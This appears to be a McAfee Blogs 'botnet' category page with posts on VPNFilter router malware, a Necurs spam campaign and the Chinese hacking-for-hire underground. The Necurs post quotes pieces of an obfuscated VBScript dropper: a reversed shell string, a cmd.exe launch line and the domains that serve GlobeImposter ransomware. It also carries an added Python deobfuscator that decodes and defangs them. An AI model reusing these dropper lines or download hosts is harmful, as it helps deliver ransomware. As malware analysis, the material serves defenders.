Category: botnet

Jun 06 2018

VPNFilter Malware Adds Capabilities to Exploit Endpoints

VPNFilter, a botnet-controlled malware that infects networking devices, was first documented by researchers from Cisco Talos. McAfee Labs also published a blog on May 23 with some initial information.

In our last post we discussed the three stages of infection and the devices affected by the malware, and how it can maintain a persistent presence on an infected device even after a reboot. The malware can also monitor traffic routed through the infected device. (Read the first post for more details.)

In this post we will report new information released by Cisco Talos. The findings reveal that the malware now targets additional devices, including products from Huawei, Asus, D-Link, Ubiquiti Networks, MikroTik, Upvel, ZTE, Linksys, Netgear, and TP-Link.

In our previous post, we discussed two modules, a traffic sniffer and Tor, used in Stage 3 of the infection. Now researchers have analysed a third module in the third stage that intercepts network traffic by using a man-in-the-middle attack and injects malicious code while content passes through the router. Using this new module, an attacker can launch an exploit, and perform data exfiltration or a JavaScript injection onto the victim’s device.

The malware added another module that deletes its traces on the infected device. It then clears the flash memory and deletes operating system files, rendering the device inoperable.

The new Stage-3 module’s packet sniffer looks for basic authentication in the traffic content, and also monitors connections for industrial control systems traffic related to the Modbus protocol, which is typically used in SCADA systems. 

Coverage and Mitigation

The aforementioned IOCs are covered as follows:

  • Detection names for files: Linux/VPNFilter
  • V3 DAT with coverage version: 3367
  • V2 DAT with coverage version: 8916

All samples are classified in the GTI cloud as malware, as well as all relevant URLs.

Further Recommendations from the Talos Threat Research Team

  • Reboot SOHO routers and NAS devices to remove the potentially destructive, nonpersistent Stage 2 and Stage 3 malware
  • Work with the manufacturer to ensure that your device is up to date with the latest patches. Apply the updated patches immediately.
  • ISPs should aggressively work with their customers to ensure their devices are patched to the most recent firmware 

Updated Indicators of Compromise and Sample Hashes 

URLs and IP addresses


File Hashes


The post VPNFilter Malware Adds Capabilities to Exploit Endpoints appeared first on McAfee Blogs.

May 23 2018

VPNFilter Botnet Targets Networking Devices

VPNFilter is a botnet with capabilities to support both intelligence collection and destructive cyberattack operations. The Cisco Talos team recently notified members of the Cyber Threat Alliance (CTA) of its findings and published this blog.

The malware is believed to target networking devices, although the malware’s initial infection vector is still unclear. Talos, which first reported this attack, claims that it has impacted at least 500,000 networking devices during the last few years. The malware can persist on infected devices and can steal website credentials and monitor Modbus SCADA protocols. It also implements file collection, command execution, data extraction, and device management and, even worse, it can render some or all of the infected devices unusable.

The known devices affected by VPNFilter are Linksys, MikroTik, Netgear, and TP-Link networking equipment in the small and home office (SOHO) space, as well as QNAP network-attached storage (NAS) devices.

Malware infection stages

VPNFilter has a three-stage infection.

Stage 1 establishes persistence on the system and uses multiple control mechanisms to find and connect to the Stage 2 deployment server.

Stage 2 focuses on file collection, command execution, data extraction, and device management. Some versions possess a self-destruct capability that renders the device unusable.

Stage 3 includes two known modules:

  • A traffic sniffer to steal website credentials and monitor Modbus SCADA protocols
  • Tor to communicate with anonymous addresses 

Indicators of compromise and sample hashes

URLs and IPs


File hashes


Coverage and mitigation

The aforementioned IOCs are covered as follows:

  • Detection names for files: Linux/VPNFilter and Linux/VPNFilter.a
    • V3 DAT with coverage version: 3353
    • V2 DAT with coverage version: 8902
  • All samples are GTI classified as malware
  • All relevant URLs are GTI classified

Further recommendations from the Talos threat research team:

  • Reboot SOHO routers and NAS devices to remove the potentially destructive, nonpersistent Stage 2 and Stage 3 malware
  • Work with the manufacturer to ensure that your device is up to date with the latest patches. Apply the updated patches immediately.

  • ISPs should work aggressively with their customers to ensure their devices are patched to the most recent firmware.

The post VPNFilter Botnet Targets Networking Devices appeared first on McAfee Blogs.

Mar 12 2018

Necurs Botnet Leads the World in Sending Spam Traffic

In Q4 2017 we found that the Necurs and Gamut botnets comprised 97% of spam botnet traffic. (See the McAfee Labs Threats Report, March 2018.) Necurs (at 60%) is currently the world’s largest spam botnet. The infected computers operate in a peer-to-peer model, with limited communication between the nodes and the control servers. Cybercriminals can rent access to the botnet to spread their own malicious campaigns.

The most common techniques are email attachments with macros or JavaScript to download malware from different locations. In October, the Locky ransomware campaign used Microsoft’s Dynamic Data Exchange to lure victims into “updating” the attached document with data from linked files—external links that delivered the malware.

In Q4 we noticed several botnet campaigns delivering the following payloads:

  • GlobeImposter ransomware
  • Locky ransomware
  • Scarab ransomware
  • Dridex banking Trojan

A timeline:

Let’s zoom in on one of the campaigns from the Necurs botnet. In the following example, an email automatically sent from a VOIP system informs the victim of a missed call. The email contains an attachment, a Visual Basic script.

In this case, the name is “Outside Caller 19-12-2017 [random nr].” Here is some of the script code:

Execute "Sub Aodunnecessarilybusinesslike(strr):ZabiT.Savetofile writenopopbusinesslikeInPlaceOf , 2 : End Sub"

Disaster = "//21+12:ptth21+12ex"+"e.eUtaLHpbP\21+12elifotevas21+12ydoBes"+"nopser21+12etirw21+12nepo21+12epyT21+12PmeT21+12TeG21+12ssecorP21+12llehs.tpircsW21+12noitacilppA.llehs21+12" & "" 

 

This piece of code makes sure that the embedded code will be saved to a file. Note the second line of code: it is written backward and names the Windows script shell used to execute the code. The following line restores it, reversing the string with StrReverse and splitting it on the "21+12" delimiter so that the backward line is read properly:

SudForMake = Split("Microsoft.XMLHTTP21+12Adodb.streaM"+StrReverse(Disaster),  "21+12")

 

The following line starts the saved code:

writenopopbusinesslikeMacAttack.Run("cmd."&"exe /c START """" "+" " & ArrArr ) 

 

Once the executable is started, it attempts to download the ransomware from the embedded URLs in the code: 

krapivec = Array("littleblessingscotons.com/jdh673hk?","smarterbaby.com/jdh673hk?","ragazzemessenger.com/jdh673hk?") 
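For analysts triaging a script like this one, the following added example (not code from the original post or from McAfee) recovers the hidden strings statically, without running the script. It models only string concatenation, StrReverse, Split and Array; the function names `deobfuscate` and `defang` are this example's own.

```python
import re

# Lines copied from the script excerpt quoted in the post (parsed, never executed).
SAMPLE = r'''
Disaster = "//21+12:ptth21+12ex"+"e.eUtaLHpbP\21+12elifotevas21+12ydoBes"+"nopser21+12etirw21+12nepo21+12epyT21+12PmeT21+12TeG21+12ssecorP21+12llehs.tpircsW21+12noitacilppA.llehs21+12" & ""
SudForMake = Split("Microsoft.XMLHTTP21+12Adodb.streaM"+StrReverse(Disaster),  "21+12")
krapivec = Array("littleblessingscotons.com/jdh673hk?","smarterbaby.com/jdh673hk?","ragazzemessenger.com/jdh673hk?")
'''

TOKEN = re.compile(r'\s*(?:("(?:[^"]|"")*")|([A-Za-z_]\w*)|([()+&,]))')
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+)$')

# The only VBScript functions modelled; any other call marks the statement unsupported.
BUILTINS = {
    "strreverse": lambda s: s[::-1],
    "split": lambda s, delim: s.split(delim),
    "array": lambda *items: list(items),
}

def tokenize(text):
    text, pos, out = text.rstrip(), 0, []
    while pos < len(text):
        m = TOKEN.match(text, pos)
        if not m:
            raise ValueError(f"unsupported syntax near {text[pos:pos + 20]!r}")
        literal, ident, punct = m.groups()
        if literal is not None:
            out.append(("str", literal[1:-1].replace('""', '"')))
        elif ident:
            out.append(("id", ident.lower()))   # VBScript names are case-insensitive
        else:
            out.append(("op", punct))
        pos = m.end()
    return out

class Evaluator:
    """Recursive-descent evaluator for VBScript string expressions."""
    def __init__(self, env):
        self.env = env

    def evaluate(self, text):
        self.toks, self.i = tokenize(text), 0
        value = self.expr()
        if self.i != len(self.toks):
            raise ValueError("trailing tokens")
        return value

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)

    def take(self, kind=None, val=None):
        tok = self.peek()
        if (kind and tok[0] != kind) or (val and tok[1] != val):
            raise ValueError(f"expected {val or kind}, got {tok}")
        self.i += 1
        return tok[1]

    def expr(self):                      # term (('+' | '&') term)*
        value = self.term()
        while self.peek() in (("op", "+"), ("op", "&")):
            self.take()
            rhs = self.term()
            if not (isinstance(value, str) and isinstance(rhs, str)):
                raise ValueError("concatenation of non-strings")
            value += rhs
        return value

    def term(self):                      # "literal" | name | name(args)
        if self.peek()[0] == "str":
            return self.take()
        name = self.take("id")
        if self.peek() != ("op", "("):
            return self.env[name]        # KeyError: variable never assigned
        self.take()
        args = []
        if self.peek() != ("op", ")"):
            args.append(self.expr())
            while self.peek() == ("op", ","):
                self.take()
                args.append(self.expr())
        self.take("op", ")")
        return BUILTINS[name](*args)     # KeyError: function not modelled

def deobfuscate(source):
    """Return {variable: value} for every assignment the evaluator can resolve."""
    env = {}
    for line in source.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        try:
            env[m.group(1).lower()] = Evaluator(env).evaluate(m.group(2))
        except (ValueError, KeyError, TypeError, AttributeError):
            continue                     # outside the modelled subset: skip
    return env

def defang(indicator):
    """Bracket the dots in the host part so the indicator is not clickable."""
    host, sep, rest = indicator.partition("/")
    return host.replace(".", "[.]") + sep + rest

if __name__ == "__main__":
    resolved = deobfuscate(SAMPLE)
    print(resolved["sudformake"])
    print([defang(u) for u in resolved["krapivec"]])
```

The recovered array names the COM objects and methods the script relies on (Microsoft.XMLHTTP, Adodb.streaM, Wscript.shell, savetofile), which are useful strings to hunt for in script-block and endpoint logs.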

 

The malware downloaded and executed is GlobeImposter ransomware. After encrypting all files and deleting the Volume Shadow copies to block file restore, the user is prompted with a request to buy the decryptor.

Spam botnets are one of the pillars of the cybercrime business. The authors of these botnets understand their market value and spend their rental income on continuous development. Their work keeps the infrastructure running, creates ever-changing spam messages, and delivers these messages to your inbox—with many avoiding spam blockers. This cybercrime effort should inspire your organization to discuss the implementation of DMARC (domain-based message authentication, reporting & conformance). To learn more about how DMARC can help protect against this kind of threat, visit dmarc.org. For more on Necurs, see the McAfee Labs Threats Report, June 2017.

The post Necurs Botnet Leads the World in Sending Spam Traffic appeared first on McAfee Blogs.

Dec 13 2017

Chinese Cybercriminals Develop Lucrative Hacking Services

Underground cybercrime profits in China have likely already exceeded US$15.1 billion (100 billion Chinese yuan); caused more than $13.8 billion (91.5 billion yuan) worth of damage relating to data loss, identity theft, and fraud; and will grow at an even faster pace as underground hackers expand international business operations to increasingly target foreign businesses, according to one report. Advanced hacking tools such as botnet, control server infrastructure, remote access tools, malware creation and obfuscation services, source-code writing services, and targeted exploitation toolkits are available on underground markets.

Other popular malicious tools and hacking services—such as spam and flooding services, denial-of-service or distributed denial-of-service attack scripts, compromised routers, and hijacked accounts—are also available in China on the black market. Criminal groups are well-organized and establish discreet buying and selling processes for malware and hacking services through QQ networks. (Tencent QQ is one of China’s most popular online communication and Internet service portals. It had more than 870 million active monthly users as of 2016. QQ users can communicate with each other or publish comments through QQ forums, shared space, QQ groups, and private chatrooms.)

Criminal groups also establish master-apprentice relationships to recruit and train new members to expand their criminal enterprise operations. All of these trends cost businesses in China and around the world tens of billions of dollars, as hacking tools sold online can be used to steal intellectual property or create social engineering attacks.

Operating Structure

The Chinese cybercriminal underground market has become more sophisticated and service-oriented as China’s economy becomes more digital. Cybercriminal groups are well-structured with a clear division of work. Contrary to their American and Russian counterparts, Chinese cybercriminals do not rely on the Deep Web. McAfee research indicates that there has been an increasing number of organized crime groups that take advantage of burgeoning QQ networks. These organized crime groups typically possess clear mechanisms for their cybercrime operations. Malware developers usually profit by creating and selling their products online; they do not get involved in underground criminal operations. Their code often includes “backdoors” that offer them continued access to their software.

QQ hacking group masters (qunzhu, 群主), also known as prawns (daxia, 大虾) or car masters (chezu, 车主) by those in Chinese cybercriminal underground networks, are the masterminds of cybercrime gangs. QQ hacking group masters purchase or acquire access to malware programs from a malware writer or wholesaler. As shown in the following graph, QQ hacking group masters recruit members or followers, who are commonly known as apprentices, and instruct apprentices on hacking techniques such as setting up malicious websites to steal personally identifiable information or bank accounts. In most cases, QQ hacking group masters collect “training fees” from the apprentices they recruit. The apprentices later become professional hackers working for their masters. Apprentices are also required to participate in multiple criminal “missions” before they complete the training programs. These hacker groups are usually private: The group masters can accept or deny membership requests on QQ networks.

 

Master-Apprentice Mechanism

Black-hat training is growing in popularity on the black market due to high profit margins in the hacking business. Some hacker groups use these training programs to recruit new members.  Once they complete the training, selected members will be offered an opportunity as apprentices or “hackers in training,” who later become full-time hackers responsible for operations such as targeted attacks, website hacking, and database exfiltration. (See the preceding graph.) The apprentices gain further experience by taking part in cybercrime schemes, including stealing bank account passwords, credit card information, private photos, personal videos, and virtual currency such as Q coins. The following screenshot is an example of black-hat hacker training materials offered by an underground hacker.

Training program offered by an underground hacker.

Products

The Chinese cybercriminal underground business has become more structured, institutional, and accessible in recent years. A great number of QQ hacking groups offer hacking services. Just as in the real world, cybercriminals and hackers take online orders. Prospective customers can fill out their service requests—including types of attacks, targeted IP addresses, tools to be deployed—and process the payments online. For example, some QQ groups provide website takedown services, which can cost up to tens of thousands of yuan, depending on the difficulty of the tasks and the security level of a targeted system. There are also QQ groups that hire black-hat hackers to conduct attacks against commercial and government targets for profit. The following list shows many of the top activities:

  • DDoS services
  • Black-hat training
  • Malware sales
  • Advanced persistent attack services
  • Exploit toolkits sales
  • Source-code writing services
  • Website hacking services
  • Spam and flooding services
  • Traffic sales
  • Phishing website sales
  • Database hacking services

Buying Hacking Services and Malware

Some hacking groups provide 24/7 technical support and customer service for customers who do not have a technical background. A hacking demonstration is also available upon request. Prices are negotiable in some cases. After agreeing on the price, the hacker-for-hire sends an email confirmation with detailed payment information. Prospective clients can transfer payments online through Taobao or Alipay.  However, prospective customers are usually required to submit an upfront deposit, which can be as much as 50% of the agreed price. Once the service is complete, the hacker-for-hire will request payment on the remaining balance.

Steps in the hacking service transaction process:

  • Negotiating price
  • Making a deposit
  • Demonstration (if requested)
  • Beginning the hacking services
  • Paying the balance

Buyers must submit full payment for software purchases such as malware, attack tools, and exploit toolkits.

Steps in the malware purchase transaction process:

  • Negotiating price
  • Paying in full for malware
  • Receiving product or exploit kit

Conclusion

The Chinese cybercriminal underground mostly targets Chinese citizens and businesses. However, a growing number of criminal groups offer hacking services that target foreign websites or businesses. These underground criminal groups are stealthy and have gradually grown in sophistication through an institutionalized chain of command, and by setting master-and-apprentice relationships to expand their business operations.  They offer a variety of malicious tools and hacking services through QQ networks and have established successful surreptitious transaction processes.

 


The post Chinese Cybercriminals Develop Lucrative Hacking Services appeared first on McAfee Blogs.